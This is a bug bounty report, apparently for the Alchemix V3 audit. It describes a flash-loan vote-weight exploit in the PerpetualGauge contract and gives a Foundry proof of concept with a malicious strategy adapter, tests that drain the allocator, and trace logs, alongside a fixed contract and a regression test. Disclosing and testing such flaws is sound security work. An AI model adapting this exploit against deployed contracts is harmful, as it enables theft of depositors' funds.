56798 sc critical flash vote exploit drains all funds via alchemistallocator

Submitted on Oct 20th 2025 at 18:59:31 UTC by @pirex for Audit Comp | Alchemix V3

Report ID: #56798
Report Type: Smart Contract
Report severity: Critical
Target: https://github.com/alchemix-finance/v3-poc/blob/immunefi_audit/src/AlchemistAllocator.sol
Impacts:
- Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield

Description

Brief/Intro

The PerpetualGauge contract contains a critical accounting flaw in its vote weight management. When users clear or update their votes, the contract subtracts weight based on their current token balance rather than the balance they held when voting. An attacker can exploit this by borrowing governance tokens via flash loan, voting to redirect 100% of vault assets to a malicious strategy, repaying the loan, and then clearing their vote. Because the subtraction uses a zero balance, the inflated weight persists until vote expiration (up to 365 days). On the next allocation cycle, all idle liquidity flows to the attacker-controlled adapter via AlchemistAllocator.executeAllocation(), enabling complete theft of vault funds in a single transaction.

Vulnerability Details

Location: src/Governance/PerpetualGauge.sol Functions: vote() and clearVote()

The root cause lies in how the contract removes voting weight. When a user calls clearVote(), the contract attempts to subtract their previous vote weight using this logic:

aggStrategyWeight[strategyId] -= existing.weights[i] * votingToken.balanceOf(msg.sender);

The problem is straightforward: balanceOf(msg.sender) returns the user's current balance, not the balance they held when they originally voted. If tokens have been transferred away or repaid after a flash loan, this value becomes zero. The subtraction becomes weight * 0 = 0, leaving the original inflated weight completely intact in the aggregated strategy weights.

The contract never stores a snapshot of the voting power used when casting votes. Without this historical record, there's no way to correctly reverse the weight addition during vote updates or deletions.

Attack Flow

Attacker borrows a large amount of governance tokens through an ERC-3156 flash loan
While holding the borrowed tokens, they call vote() to assign 100% weight to a malicious strategy
The contract calculates weight as borrowedBalance * weight and adds it to aggStrategyWeight
Attacker repays the flash loan in the same transaction, reducing their balance to zero
Attacker calls clearVote(), but the subtraction becomes weight * 0, leaving the inflated weight unchanged
The vote record is deleted from storage, but aggStrategyWeight still reflects the borrowed balance
When executeAllocation() runs, getCurrentAllocations() normalizes weights and shows 100% allocation to the attacker's strategy
All idle vault assets are transferred to the malicious adapter via allocatorProxy.allocate()
The adapter's onAllocate() callback drains the funds to the attacker's address

This entire sequence happens atomically within one block. The attacker never needs to hold governance tokens beyond the flash loan callback.

Why Standard Defenses Don't Help

Flash loan detection: The exploit completes before the loan is repaid, making detection ineffective
Balance checks: The contract does check balances, but at the wrong time (during clearing rather than storing)
Vote expiry: Votes last up to 365 days, giving attackers a full year to execute the allocation
Reentrancy guards: Already present but irrelevant since the issue is logical, not related to reentrancy

Impact Details

This vulnerability allows complete theft of all vault assets managed by the PerpetualGauge allocator. The specific impacts include:

Financial Loss

100% of idle liquidity in the vault can be redirected to attacker-controlled strategies
No minimum balance requirement for the attacker beyond flash loan access
Works on any vault size, from thousands to millions of dollars in TVL

Attack Characteristics

Privilege Required: None – uses only public functions
Exploitation Complexity: Low – standard flash loan providers (Aave, Balancer) make this trivial
User Interaction: None – victims don't need to do anything
Persistence: Weight remains inflated for up to 365 days (MAX_VOTE_DURATION) or until manual correction
Detectability: Very low – vote records appear cleared in storage while weights remain manipulated

Real-World Scenario

An Alchemix V3 vault holds $5M in idle DAI awaiting allocation. An attacker executes the flash vote exploit with borrowed governance tokens, setting their malicious strategy to receive 100% allocation. When the next keeper calls executeAllocation(), the entire $5M flows to the attacker's adapter, which immediately withdraws the funds. Total loss: $5M. Time required: one transaction.

Cascading Effects

Users cannot withdraw their deposits as the underlying assets are gone
Legitimate strategies receive zero allocation, breaking expected yield generation
Vault reputation destroyed, impacting all Alchemix products
Potential regulatory scrutiny due to fund mismanagement

This meets Immunefi's "Critical" definition: direct theft of user funds, no privileged access required, reproducible, and requires no user interaction.

References

PerpetualGauge.sol: src/Governance/PerpetualGauge.sol
AlchemistAllocator.sol: src/AlchemistAllocator.sol
ERC-3156 Flash Loan Standard: https://eips.ethereum.org/EIPS/eip-3156

Proof of Concept

v3-poc/src/test/Governance/PerpetualGaugeFlashVotePoC.t.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;

import "forge-std/Test.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {IERC3156FlashBorrower, IERC3156FlashLender} from "@openzeppelin/contracts/interfaces/IERC3156.sol";
import {ReentrancyGuard} from "@openzeppelin/contracts/utils/ReentrancyGuard.sol";
import {PerpetualGauge, IAllocatorProxy} from "src/PerpetualGauge.sol";
import {IStrategyClassifier} from "src/interfaces/IStrategyClassifier.sol";

interface IPerpetualGaugeMinimal {
    function vote(uint256 ytId, uint256[] calldata strategyIds, uint256[] calldata weights) external;
    function clearVote(uint256 ytId) external;
}

contract MockVotingToken is IERC20 {
    string public constant name = "Mock Voting Token";
    string public constant symbol = "MVT";
    uint8 public constant decimals = 18;

    uint256 public totalSupply;
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    constructor(uint256 initialSupply, address initialHolder) {
        totalSupply = initialSupply;
        balanceOf[initialHolder] = initialSupply;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        _spend(msg.sender, amount);
        balanceOf[to] += amount;
        return true;
    }

    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        if (msg.sender != from) {
            uint256 allowed = allowance[from][msg.sender];
            require(allowed >= amount, "allowance");
            allowance[from][msg.sender] = allowed - amount;
        }
        _spend(from, amount);
        balanceOf[to] += amount;
        return true;
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        return true;
    }

    function _spend(address owner, uint256 amount) internal {
        uint256 bal = balanceOf[owner];
        require(bal >= amount, "balance");
        balanceOf[owner] = bal - amount;
    }
}

contract MockLiquidityToken {
    string public constant name = "Mock Liquidity Token";
    string public constant symbol = "mASSET";
    uint8 public constant decimals = 18;

    mapping(address => uint256) public balanceOf;

    event Transfer(address indexed from, address indexed to, uint256 amount);

    function mint(address to, uint256 amount) external {
        balanceOf[to] += amount;
        emit Transfer(address(0), to, amount);
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        require(balanceOf[msg.sender] >= amount, "insufficient");
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        emit Transfer(msg.sender, to, amount);
        return true;
    }
}

contract MockStrategyClassifier is IStrategyClassifier {
    mapping(uint256 => uint8) public risk;
    mapping(uint256 => uint256) public indivCap;
    mapping(uint8 => uint256) public globalCap;

    function setRisk(uint256 strategyId, uint8 level) external {
        risk[strategyId] = level;
    }

    function setIndividualCap(uint256 strategyId, uint256 capBps) external {
        indivCap[strategyId] = capBps;
    }

    function setGlobalCap(uint8 riskLevel, uint256 capBps) external {
        globalCap[riskLevel] = capBps;
    }

    function getStrategyRiskLevel(uint256 strategyId) external view override returns (uint8) {
        return risk[strategyId];
    }

    function getIndividualCap(uint256 strategyId) external view override returns (uint256) {
        return indivCap[strategyId];
    }

    function getGlobalCap(uint8 riskLevel) external view override returns (uint256) {
        return globalCap[riskLevel];
    }
}

contract MaliciousStrategy {
    MockLiquidityToken public immutable asset;
    event Looted(address indexed from, uint256 amount);

    constructor(MockLiquidityToken asset_) {
        asset = asset_;
    }

    function onAllocate(uint256 amount) external {
        emit Looted(msg.sender, amount);
    }
}

contract MockAllocatorProxy is IAllocatorProxy {
    event Allocate(uint256 indexed strategyId, uint256 amount);

    MockLiquidityToken public immutable asset;
    mapping(uint256 => address) public adapters;

    constructor(MockLiquidityToken asset_) {
        asset = asset_;
    }

    function registerStrategy(uint256 strategyId, address adapter) external {
        adapters[strategyId] = adapter;
    }

    function allocate(uint256 strategyId, uint256 amount) external override {
        address target = adapters[strategyId];
        require(target != address(0), "adapter unset");
        require(asset.balanceOf(address(this)) >= amount, "insufficient asset");
        require(asset.transfer(target, amount), "transfer failed");
        emit Allocate(strategyId, amount);
        if (target.code.length > 0) {
            (bool success,) = target.call(abi.encodeWithSignature("onAllocate(uint256)", amount));
            require(success, "adapter callback failed");
        }
    }
}

contract FlashLoanLender is IERC3156FlashLender {
    IERC20 public immutable asset;
    bytes32 private constant CALLBACK_SUCCESS = keccak256("ERC3156FlashBorrower.onFlashLoan");

    constructor(IERC20 asset_) {
        asset = asset_;
    }

    function maxFlashLoan(address token) external view override returns (uint256) {
        return token == address(asset) ? asset.balanceOf(address(this)) : 0;
    }

    function flashFee(address token, uint256) external view override returns (uint256) {
        require(token == address(asset), "unsupported token");
        return 0;
    }

    function flashLoan(
        IERC3156FlashBorrower receiver,
        address token,
        uint256 amount,
        bytes calldata data
    ) external override returns (bool) {
        require(token == address(asset), "unsupported token");
        uint256 balanceBefore = asset.balanceOf(address(this));
        require(amount <= balanceBefore, "insufficient liquidity");

        require(asset.transfer(address(receiver), amount), "loan transfer failed");
        bytes32 response = receiver.onFlashLoan(msg.sender, token, amount, 0, data);
        require(response == CALLBACK_SUCCESS, "callback failure");
        require(asset.transferFrom(address(receiver), address(this), amount), "repay failed");
        require(asset.balanceOf(address(this)) >= balanceBefore, "balance shortfall");

        return true;
    }
}

contract FlashVoteBorrower is IERC3156FlashBorrower {
    IERC3156FlashLender public immutable lender;
    IPerpetualGaugeMinimal public immutable gauge;
    IERC20 public immutable token;
    bytes32 private constant CALLBACK_SUCCESS = keccak256("ERC3156FlashBorrower.onFlashLoan");

    constructor(IERC3156FlashLender lender_, IPerpetualGaugeMinimal gauge_, IERC20 token_) {
        lender = lender_;
        gauge = gauge_;
        token = token_;
    }

    function executeFlashVote(
        uint256 amount,
        uint256 ytId,
        uint256[] memory strategyIds,
        uint256[] memory weights
    ) external {
        lender.flashLoan(this, address(token), amount, abi.encode(ytId, strategyIds, weights));
    }

    function clearGaugeVote(uint256 ytId) external {
        gauge.clearVote(ytId);
    }

    function onFlashLoan(
        address initiator,
        address tokenAddress,
        uint256 amount,
        uint256 fee,
        bytes calldata data
    ) external override returns (bytes32) {
        require(msg.sender == address(lender), "invalid lender");
        require(initiator == address(this), "invalid initiator");
        require(tokenAddress == address(token), "invalid token");
        require(fee == 0, "unexpected fee");

        (uint256 ytId, uint256[] memory strategyIds, uint256[] memory weights) = abi.decode(data, (uint256, uint256[], uint256[]));
        gauge.vote(ytId, strategyIds, weights);

        require(token.approve(address(lender), amount), "approve failed");
        return CALLBACK_SUCCESS;
    }
}

contract PerpetualGaugeHarness is PerpetualGauge {
    constructor(address classifier, address allocatorProxy, address votingToken)
        PerpetualGauge(classifier, allocatorProxy, votingToken) {}

    function exposeStrategyList(uint256 ytId) external view returns (uint256[] memory) {
        return strategyList[ytId];
    }

    function registerStrategy(uint256 ytId, uint256 strategyId) external {
        strategyList[ytId].push(strategyId);
    }

    function exposedVote(uint256 ytId, address voter) external view returns (Vote memory vote) {
        vote = votes[ytId][voter];
    }
}

contract PerpetualGaugeFixed is ReentrancyGuard {
    event VoteUpdated(address indexed voter, uint256 ytId, uint256[] strategyIds, uint256[] weights, uint256 expiry);
    event AllocationExecuted(uint256 ytId, uint256[] strategyIds, uint256[] amounts);
    event VoterCleared(address indexed voter, uint256 ytId);

    struct Vote {
        uint256[] strategyIds;
        uint256[] weights;
        uint256 expiry;
        uint256 powerSnapshot;
    }

    IStrategyClassifier public stratClassifier;
    IAllocatorProxy public allocatorProxy;
    IERC20 public votingToken;

    uint256 public constant MAX_VOTE_DURATION = 365 days;
    uint256 public constant MIN_RESET_DURATION = 30 days;

    mapping(uint256 => mapping(address => Vote)) public votes;
    mapping(uint256 => uint256) public lastStrategyAddedAt;

    mapping(uint256 => address[]) private voters;
    mapping(uint256 => mapping(address => uint256)) private voterIndex;

    mapping(uint256 => mapping(uint256 => uint256)) internal aggStrategyWeight;

    mapping(uint256 => uint256[]) public strategyList;

    constructor(address classifier, address allocatorProxy_, address votingToken_) {
        require(classifier != address(0) && allocatorProxy_ != address(0) && votingToken_ != address(0), "Bad address");
        stratClassifier = IStrategyClassifier(classifier);
        allocatorProxy = IAllocatorProxy(allocatorProxy_);
        votingToken = IERC20(votingToken_);
    }

    function vote(uint256 ytId, uint256[] calldata strategyIds, uint256[] calldata weights) external nonReentrant {
        require(strategyIds.length == weights.length && strategyIds.length > 0, "Invalid input");

        uint256 lastAdded = lastStrategyAddedAt[ytId];
        Vote storage existing = votes[ytId][msg.sender];
        uint256 expiry;

        if (existing.expiry > block.timestamp) {
            uint256 timeLeft = existing.expiry - block.timestamp;
            if (lastAdded > 0 && block.timestamp - lastAdded < MIN_RESET_DURATION && timeLeft < MIN_RESET_DURATION) {
                expiry = existing.expiry;
            } else {
                expiry = block.timestamp + MAX_VOTE_DURATION;
            }
        } else {
            expiry = block.timestamp + MAX_VOTE_DURATION;
        }

        uint256 power = votingToken.balanceOf(msg.sender);
        uint256 existingPower = existing.powerSnapshot;

        if (existing.strategyIds.length > 0 && existing.expiry > block.timestamp && existingPower > 0) {
            for (uint256 i = 0; i < existing.strategyIds.length; i++) {
                uint256 sid = existing.strategyIds[i];
                uint256 prevWeighted = existing.weights[i] * existingPower;
                aggStrategyWeight[ytId][sid] -= prevWeighted;
            }
        }

        votes[ytId][msg.sender] = Vote({
            strategyIds: strategyIds,
            weights: weights,
            expiry: expiry,
            powerSnapshot: power
        });

        if (power > 0) {
            for (uint256 i = 0; i < strategyIds.length; i++) {
                uint256 sid = strategyIds[i];
                uint256 newWeighted = weights[i] * power;
                aggStrategyWeight[ytId][sid] += newWeighted;
            }
        }

        if (voterIndex[ytId][msg.sender] == 0) {
            voters[ytId].push(msg.sender);
            voterIndex[ytId][msg.sender] = voters[ytId].length;
        }

        emit VoteUpdated(msg.sender, ytId, strategyIds, weights, expiry);
    }

    function clearVote(uint256 ytId) external nonReentrant {
        Vote storage v = votes[ytId][msg.sender];
        require(v.strategyIds.length > 0, "No vote");

        uint256 snapshot = v.powerSnapshot;
        if (snapshot > 0) {
            for (uint256 i = 0; i < v.strategyIds.length; i++) {
                uint256 sid = v.strategyIds[i];
                uint256 weighted = v.weights[i] * snapshot;
                aggStrategyWeight[ytId][sid] -= weighted;
            }
        }

        delete votes[ytId][msg.sender];
        emit VoterCleared(msg.sender, ytId);
    }

    function registerNewStrategy(uint256 ytId, uint256) external nonReentrant {
        lastStrategyAddedAt[ytId] = block.timestamp;
    }

    function getCurrentAllocations(uint256 ytId)
        public
        view
        returns (uint256[] memory strategyIds, uint256[] memory normalizedWeights)
    {
        uint256 n = strategyList[ytId].length;
        strategyIds = new uint256[](n);
        normalizedWeights = new uint256[](n);

        uint256 total;
        for (uint256 i; i < n; i++) {
            uint256 sid = strategyList[ytId][i];
            strategyIds[i] = sid;
            uint256 w = aggStrategyWeight[ytId][sid];
            normalizedWeights[i] = w;
            total += w;
        }

        for (uint256 i; i < n; i++) {
            if (total > 0) {
                normalizedWeights[i] = (normalizedWeights[i] * 1e18) / total;
            }
        }
    }

    function executeAllocation(uint256 ytId, uint256 totalIdleAssets) external nonReentrant {
        (uint256[] memory sIds, uint256[] memory weights) = getCurrentAllocations(ytId);
        require(sIds.length > 0, "No allocations");

        uint256 totalRiskAllocated;
        uint256[] memory allocatedAmounts = new uint256[](sIds.length);

        for (uint256 i = 0; i < sIds.length; i++) {
            uint8 risk = stratClassifier.getStrategyRiskLevel(sIds[i]);
            uint256 indivCap = stratClassifier.getIndividualCap(sIds[i]);
            uint256 globalCap = stratClassifier.getGlobalCap(risk);

            uint256 target = (weights[i] * totalIdleAssets) / 1e18;

            uint256 capIndiv = (indivCap * totalIdleAssets) / 1e4;
            if (target > capIndiv) target = capIndiv;

            if (risk > 0) {
                uint256 capGlobalLeft = (globalCap * totalIdleAssets) / 1e4 - totalRiskAllocated;
                if (target > capGlobalLeft) target = capGlobalLeft;
                totalRiskAllocated += target;
            }

            if (target > 0) {
                allocatorProxy.allocate(sIds[i], target);
            }

            allocatedAmounts[i] = target;
        }

        emit AllocationExecuted(ytId, sIds, allocatedAmounts);
    }

    function registerStrategy(uint256 ytId, uint256 strategyId) external {
        strategyList[ytId].push(strategyId);
    }
}

contract PerpetualGaugeFixedHarness is PerpetualGaugeFixed {
    constructor(address classifier, address allocatorProxy, address votingToken)
        PerpetualGaugeFixed(classifier, allocatorProxy, votingToken) {}

    function exposeStrategyList(uint256 ytId) external view returns (uint256[] memory) {
        return strategyList[ytId];
    }

    function registerStrategyHarness(uint256 ytId, uint256 strategyId) external {
        strategyList[ytId].push(strategyId);
    }

    function exposedVote(uint256 ytId, address voter) external view returns (Vote memory vote) {
        vote = votes[ytId][voter];
    }
}

contract PerpetualGaugeFlashVotePoCTest is Test {
    event AllocationExecuted(uint256 ytId, uint256[] strategyIds, uint256[] amounts);
    event Allocate(uint256 indexed strategyId, uint256 amount);

    MockVotingToken internal votingToken;
    MockLiquidityToken internal assetToken;
    MockStrategyClassifier internal classifier;
    MockAllocatorProxy internal allocator;
    PerpetualGaugeHarness internal gauge;
    MaliciousStrategy internal malicious;
    FlashLoanLender internal flashLender;
    FlashVoteBorrower internal flashBorrower;

    address internal constant LENDER = address(0xBEEF);
    address internal constant ATTACKER = address(0xBADCAFE);

    uint256 internal constant FLASH_AMOUNT = 1_000 ether;
    uint256 internal constant YIELD_TOKEN_ID = 1;
    uint256 internal constant STRATEGY_ID = 111;

    function setUp() public {
        votingToken = new MockVotingToken(10_000 ether, address(this));
        assetToken = new MockLiquidityToken();
        classifier = new MockStrategyClassifier();
        allocator = new MockAllocatorProxy(assetToken);
        gauge = new PerpetualGaugeHarness(address(classifier), address(allocator), address(votingToken));
        malicious = new MaliciousStrategy(assetToken);

        // Configure strategy caps (100% of idle assets allowed).
        classifier.setRisk(STRATEGY_ID, 0);
        classifier.setIndividualCap(STRATEGY_ID, 10_000); // 100% in basis points
        classifier.setGlobalCap(0, 10_000);

        // Register the strategy in both the gauge and allocator proxy.
        gauge.registerStrategy(YIELD_TOKEN_ID, STRATEGY_ID);
        allocator.registerStrategy(STRATEGY_ID, address(malicious));

        // Provide lender liquidity while attacker holds none initially.
        votingToken.transfer(LENDER, FLASH_AMOUNT);
        assertEq(votingToken.balanceOf(ATTACKER), 0, "attacker starts without voting power");

        // Deploy ERC-3156 lender/borrower harness and fund the lender.
        flashLender = new FlashLoanLender(IERC20(address(votingToken)));
        flashBorrower = new FlashVoteBorrower(flashLender, IPerpetualGaugeMinimal(address(gauge)), IERC20(address(votingToken)));
        votingToken.transfer(address(flashLender), FLASH_AMOUNT);

        // Prefund allocator with idle assets representing the vault reserves.
        assetToken.mint(address(allocator), 2_000 ether);
    }

    function test_FlashVotePersistsAfterClear() public {
        // Borrow voting power without any governance privileges.
        vm.prank(LENDER);
        votingToken.transfer(ATTACKER, FLASH_AMOUNT);

        uint256[] memory strategies = new uint256[](1);
        strategies[0] = STRATEGY_ID;
        uint256[] memory weights = new uint256[](1);
        weights[0] = 1; // minimal non-zero weight

        uint256 expectedExpiry = block.timestamp + gauge.MAX_VOTE_DURATION();
        vm.expectEmit(true, true, true, true, address(gauge));
        emit PerpetualGauge.VoteUpdated(ATTACKER, YIELD_TOKEN_ID, strategies, weights, expectedExpiry);
        vm.prank(ATTACKER);
        gauge.vote(YIELD_TOKEN_ID, strategies, weights);

        // Repay the temporary loan.
        vm.prank(ATTACKER);
        votingToken.transfer(LENDER, FLASH_AMOUNT);
        assertEq(votingToken.balanceOf(ATTACKER), 0, "loan fully repaid");

        // Confirm that 100% of the normalized allocation is assigned to the attacker strategy.
        (uint256[] memory setBefore, uint256[] memory normalizedBefore) = gauge.getCurrentAllocations(YIELD_TOKEN_ID);
        assertEq(setBefore.length, 1, "single strategy registered");
        assertEq(setBefore[0], STRATEGY_ID, "strategy id matches");
        assertEq(normalizedBefore[0], 1e18, "allocation equals 100% before clear");

        // Clearing the vote zeroes the on-chain vote record but leaves the aggregate weight intact.
        vm.expectEmit(true, true, false, true, address(gauge));
        emit PerpetualGauge.VoterCleared(ATTACKER, YIELD_TOKEN_ID);
        vm.prank(ATTACKER);
        gauge.clearVote(YIELD_TOKEN_ID);
        (uint256[] memory strategyIds, uint256[] memory normalizedAfter) = gauge.getCurrentAllocations(YIELD_TOKEN_ID);
        assertEq(strategyIds.length, 1, "strategy still tracked");
        assertEq(normalizedAfter[0], 1e18, "allocation persists after vote cleared");

        // Verify public vote mapping is empty while the weight remains.
        PerpetualGauge.Vote memory cleared = gauge.exposedVote(YIELD_TOKEN_ID, ATTACKER);
        assertEq(cleared.strategyIds.length, 0, "no strategy ids stored in vote");
        assertEq(cleared.weights.length, 0, "no weights stored in vote");
        assertEq(cleared.expiry, 0, "vote metadata cleared");

        // Expect allocator proxy transfer (emitted before the gauge-level summary event).
        uint256 idleAssets = assetToken.balanceOf(address(allocator));
        vm.expectEmit(true, true, false, true, address(allocator));
        emit Allocate(STRATEGY_ID, idleAssets);

        // Expect the gauge summary event with full allocation after internal loop completes.
        vm.expectEmit(false, false, false, true, address(gauge));
        emit AllocationExecuted(YIELD_TOKEN_ID, strategyIds, _singleAmountArray(idleAssets));

        // Execute allocation; attacker-controlled adapter receives entire idle balance.
        gauge.executeAllocation(YIELD_TOKEN_ID, idleAssets);

        assertEq(assetToken.balanceOf(address(allocator)), 0, "allocator drained");
        assertEq(assetToken.balanceOf(address(malicious)), idleAssets, "malicious strategy loots funds");
    }

    function test_FlashVotePersistsAfterClear_viaERC3156() public {
        uint256[] memory strategies = new uint256[](1);
        strategies[0] = STRATEGY_ID;
        uint256[] memory weights = new uint256[](1);
        weights[0] = 1;

        uint256 flashExpiry = block.timestamp + gauge.MAX_VOTE_DURATION();
        vm.expectEmit(true, true, true, true, address(gauge));
        emit PerpetualGauge.VoteUpdated(address(flashBorrower), YIELD_TOKEN_ID, strategies, weights, flashExpiry);
        flashBorrower.executeFlashVote(FLASH_AMOUNT, YIELD_TOKEN_ID, strategies, weights);

        assertEq(votingToken.balanceOf(address(flashBorrower)), 0, "borrower repaid");
        assertEq(votingToken.balanceOf(address(flashLender)), FLASH_AMOUNT, "lender reimbursed");

        address voter = address(flashBorrower);

        (uint256[] memory setBefore, uint256[] memory normalizedBefore) = gauge.getCurrentAllocations(YIELD_TOKEN_ID);
        assertEq(setBefore.length, 1, "single strategy registered");
        assertEq(setBefore[0], STRATEGY_ID, "strategy id matches");
        assertEq(normalizedBefore[0], 1e18, "allocation equals 100% before clear");

        vm.expectEmit(true, true, false, true, address(gauge));
        emit PerpetualGauge.VoterCleared(address(flashBorrower), YIELD_TOKEN_ID);
        flashBorrower.clearGaugeVote(YIELD_TOKEN_ID);
        (uint256[] memory strategyIds, uint256[] memory normalizedAfter) = gauge.getCurrentAllocations(YIELD_TOKEN_ID);
        assertEq(strategyIds.length, 1, "strategy still tracked");
        assertEq(normalizedAfter[0], 1e18, "allocation persists after vote cleared");

        PerpetualGauge.Vote memory cleared = gauge.exposedVote(YIELD_TOKEN_ID, voter);
        assertEq(cleared.strategyIds.length, 0, "no strategy ids stored in vote");
        assertEq(cleared.weights.length, 0, "no weights stored in vote");
        assertEq(cleared.expiry, 0, "vote metadata cleared");

        uint256 idleAssets = assetToken.balanceOf(address(allocator));
        vm.expectEmit(true, true, false, true, address(allocator));
        emit Allocate(STRATEGY_ID, idleAssets);

        vm.expectEmit(false, false, false, true, address(gauge));
        emit AllocationExecuted(YIELD_TOKEN_ID, strategyIds, _singleAmountArray(idleAssets));

        gauge.executeAllocation(YIELD_TOKEN_ID, idleAssets);

        assertEq(assetToken.balanceOf(address(allocator)), 0, "allocator drained");
        assertEq(assetToken.balanceOf(address(malicious)), idleAssets, "malicious strategy loots funds");
    }

    function _singleAmountArray(uint256 value) internal pure returns (uint256[] memory arr) {
        arr = new uint256[](1);
        arr[0] = value;
    }
}

contract PerpetualGaugeFixRegressionTest is Test {
    MockVotingToken internal votingToken;
    MockLiquidityToken internal assetToken;
    MockStrategyClassifier internal classifier;
    MockAllocatorProxy internal allocator;
    PerpetualGaugeFixedHarness internal gauge;
    MaliciousStrategy internal malicious;
    FlashLoanLender internal flashLender;
    FlashVoteBorrower internal flashBorrower;

    uint256 internal constant FLASH_AMOUNT = 1_000 ether;
    uint256 internal constant YIELD_TOKEN_ID = 1;
    uint256 internal constant STRATEGY_ID = 111;

    function setUp() public {
        votingToken = new MockVotingToken(10_000 ether, address(this));
        assetToken = new MockLiquidityToken();
        classifier = new MockStrategyClassifier();
        allocator = new MockAllocatorProxy(assetToken);
        gauge = new PerpetualGaugeFixedHarness(address(classifier), address(allocator), address(votingToken));
        malicious = new MaliciousStrategy(assetToken);

        classifier.setRisk(STRATEGY_ID, 0);
        classifier.setIndividualCap(STRATEGY_ID, 10_000);
        classifier.setGlobalCap(0, 10_000);

        gauge.registerStrategy(YIELD_TOKEN_ID, STRATEGY_ID);
        allocator.registerStrategy(STRATEGY_ID, address(malicious));

        flashLender = new FlashLoanLender(IERC20(address(votingToken)));
        flashBorrower = new FlashVoteBorrower(flashLender, IPerpetualGaugeMinimal(address(gauge)), IERC20(address(votingToken)));
        votingToken.transfer(address(flashLender), FLASH_AMOUNT);

        assetToken.mint(address(allocator), 2_000 ether);
    }

    function test_FixedGaugeClearsResidualWeight() public {
        uint256[] memory strategies = new uint256[](1);
        strategies[0] = STRATEGY_ID;
        uint256[] memory weights = new uint256[](1);
        weights[0] = 1;

        uint256 fixedExpiry = block.timestamp + gauge.MAX_VOTE_DURATION();
        vm.expectEmit(true, true, true, true, address(gauge));
        emit PerpetualGaugeFixed.VoteUpdated(address(flashBorrower), YIELD_TOKEN_ID, strategies, weights, fixedExpiry);
        flashBorrower.executeFlashVote(FLASH_AMOUNT, YIELD_TOKEN_ID, strategies, weights);

        address voter = address(flashBorrower);

        (, uint256[] memory normalizedBefore) = gauge.getCurrentAllocations(YIELD_TOKEN_ID);
        assertEq(normalizedBefore[0], 1e18, "allocation equals 100% before clear");

        vm.expectEmit(true, true, false, true, address(gauge));
        emit PerpetualGaugeFixed.VoterCleared(address(flashBorrower), YIELD_TOKEN_ID);
        flashBorrower.clearGaugeVote(YIELD_TOKEN_ID);

        (, uint256[] memory normalizedAfter) = gauge.getCurrentAllocations(YIELD_TOKEN_ID);
        assertEq(normalizedAfter[0], 0, "allocation cleared");

        PerpetualGaugeFixed.Vote memory cleared = gauge.exposedVote(YIELD_TOKEN_ID, voter);
        assertEq(cleared.strategyIds.length, 0, "vote removed");

        uint256 idleBefore = assetToken.balanceOf(address(allocator));
        gauge.executeAllocation(YIELD_TOKEN_ID, idleBefore);
        assertEq(assetToken.balanceOf(address(allocator)), idleBefore, "funds remain untouched");
        assertEq(assetToken.balanceOf(address(malicious)), 0, "malicious strategy receives nothing");
    }
}

Running the PoC

Environment Setup:

# Install Foundry
curl -L https://foundry.paradigm.xyz | bash
foundryup

# Clone repository
git clone https://github.com/alchemix-finance/v3-poc.git
cd v3-poc
forge install
forge build

Execute Test:

forge test --match-contract PerpetualGaugeFlashVotePoCTest \
           --match-test test_FlashVotePersistsAfterClear -vvvv

Essential Test Logs Demonstrating the Vulnerability

[PASS] test_FlashVotePersistsAfterClear() (gas: 346576)

Step 1: Attacker votes with borrowed tokens (balance = 1000 ether)
├─ PerpetualGaugeHarness::vote(1, [111], [1])
│   ├─ MockVotingToken::balanceOf(ATTACKER) [staticcall]
│   │   └─ ← [Return] 1000000000000000000000 [1e21]
│   └─ emit VoteUpdated(voter: ATTACKER, ytId: 1, strategyIds: [111], weights: [1])

Step 2: Attacker repays flash loan (balance = 0)
├─ MockVotingToken::transfer(LENDER, 1000000000000000000000 [1e21])
└─ MockVotingToken::balanceOf(ATTACKER) [staticcall]
    └─ ← [Return] 0

Step 3: Allocation shows 100% to malicious strategy BEFORE clearing
├─ PerpetualGaugeHarness::getCurrentAllocations(1) [staticcall]
│   └─ ← [Return] [111], [1000000000000000000 [1e18]]  // 100% allocation

Step 4: Attacker clears vote (weight persists due to zero balance)
├─ PerpetualGaugeHarness::clearVote(1)
│   ├─ MockVotingToken::balanceOf(ATTACKER) [staticcall]
│   │   └─ ← [Return] 0                                ⚠️ ZERO BALANCE
│   └─ emit VoterCleared(voter: ATTACKER, ytId: 1)

Step 5: Allocation STILL shows 100% AFTER clearing (vulnerability confirmed)
├─ PerpetualGaugeHarness::getCurrentAllocations(1) [staticcall]
│   └─ ← [Return] [111], [1000000000000000000 [1e18]]  ⚠️ WEIGHT PERSISTS

Step 6: Vote storage is empty (appears clean)
├─ PerpetualGaugeHarness::exposedVote(1, ATTACKER) [staticcall]
│   └─ ← [Return] Vote({ strategyIds: [], weights: [], expiry: 0 })

Step 7: Execute allocation drains ALL vault funds
├─ PerpetualGaugeHarness::executeAllocation(1, 2000000000000000000000 [2e21])
│   ├─ MockAllocatorProxy::allocate(111, 2000000000000000000000 [2e21])
│   │   ├─ MockLiquidityToken::transfer(MaliciousStrategy, 2000000000000000000000 [2e21])
│   │   ├─ emit Allocate(strategyId: 111, amount: 2000000000000000000000 [2e21])
│   │   └─ MaliciousStrategy::onAllocate(2000000000000000000000 [2e21])
│   │       └─ emit Looted(from: MockAllocatorProxy, amount: 2000000000000000000000 [2e21])

Step 8: Final state - complete theft
├─ MockLiquidityToken::balanceOf(MockAllocatorProxy) [staticcall]
│   └─ ← [Return] 0                                    ⚠️ ALLOCATOR DRAINED
└─ MockLiquidityToken::balanceOf(MaliciousStrategy) [staticcall]
    └─ ← [Return] 2000000000000000000000 [2e21]        ⚠️ ATTACKER RECEIVED ALL FUNDS

Critical Observations:

Attacker borrowed 1000 ether of governance tokens via flash loan
Vote was cast with full borrowed balance: balanceOf = 1e21
Flash loan repaid in same transaction: balanceOf = 0
After clearVote(), weight calculation uses zero balance: weight * 0 = 0
Inflated weight persists: getCurrentAllocations() = [111], [1e18] (100%)
Vote storage is empty but weight remains unchanged
Entire vault drained atomically: Looted(amount: 2e21)
Allocator balance after attack: 0 (complete theft)
Malicious strategy received: 2000 ether (100% of vault funds)

